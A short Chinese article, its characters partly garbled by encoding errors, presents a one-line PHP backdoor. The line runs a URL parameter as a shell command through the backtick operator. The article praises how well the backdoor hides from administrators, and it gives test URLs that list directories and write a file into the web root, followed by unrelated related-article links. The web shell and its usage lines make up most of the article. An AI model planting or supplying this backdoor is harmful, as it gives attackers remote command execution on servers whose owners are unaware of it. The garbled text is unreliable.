一個不易被發(fā)現(xiàn)的PHP后門代碼解析
偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個一般的PHPer都不怎么關(guān)注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數(shù)。
偽裝性很好,很容易被管理員忽略。
$selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; }
剛看到這段代碼我想大家都會說沒有問題,但是細(xì)心的朋友也會發(fā)現(xiàn)下面的變量被一個符號包起來了,既然是變量為什么要這樣了,
而且又不是單引號,這個就是關(guān)鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),
通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果
如果不信的朋友可以測試
http://127.0.0.1/t.php?r=dir 可以列出目錄
http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php
我用 appserv 和虛擬主機已經(jīng)測試成功。
相關(guān)文章
PHP基于PDO調(diào)用sqlserver存儲過程通用方法【基于Yii框架】
這篇文章主要介紹了PHP基于PDO調(diào)用sqlserver存儲過程通用方法,結(jié)合實例形式分析了基于Yii框架采用pdo調(diào)用sqlserver存儲過程的相關(guān)操作步驟與實現(xiàn)技巧,需要的朋友可以參考下2017-10-10php中的路徑問題與set_include_path使用介紹
這篇文章主要介紹了php中的路徑問題與set_include_path,需要的朋友可以參考下2014-02-02PHP實現(xiàn)采集抓取淘寶網(wǎng)單個商品信息
這篇文章主要介紹了PHP實現(xiàn)采集抓取淘寶網(wǎng)單個商品信息,本文是一種實現(xiàn)思路,使用file_get_contents函數(shù)實現(xiàn),并給出了采集正則,需要的朋友可以參考下2015-01-01